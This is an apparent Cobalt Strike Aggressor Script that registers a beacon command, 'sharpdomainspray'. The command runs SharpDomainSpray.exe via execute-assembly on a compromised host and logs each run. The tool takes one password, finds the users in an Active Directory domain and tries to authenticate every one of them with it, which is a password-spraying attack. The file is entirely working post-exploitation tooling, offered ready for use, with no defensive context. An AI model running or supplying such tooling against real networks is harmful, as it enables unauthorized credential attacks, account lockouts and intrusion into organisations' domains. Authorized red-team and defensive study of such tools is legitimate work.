beacon_command_register("sharpdomainspray", "Takes a password then finds users in the domain and attempts to authenticate to the domain with that given password",
	"Usage: sharpdomainspray [arguments]\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n" .
	"Example: sharpdomainspray test12345!");	
	
alias sharpdomainspray{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$asm = "/opt/cobalt_strike_extension_kit/exe/SharpDomainSpray.exe";
	$desc = "SharpDomainSpray";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, $asm, $argu);
}
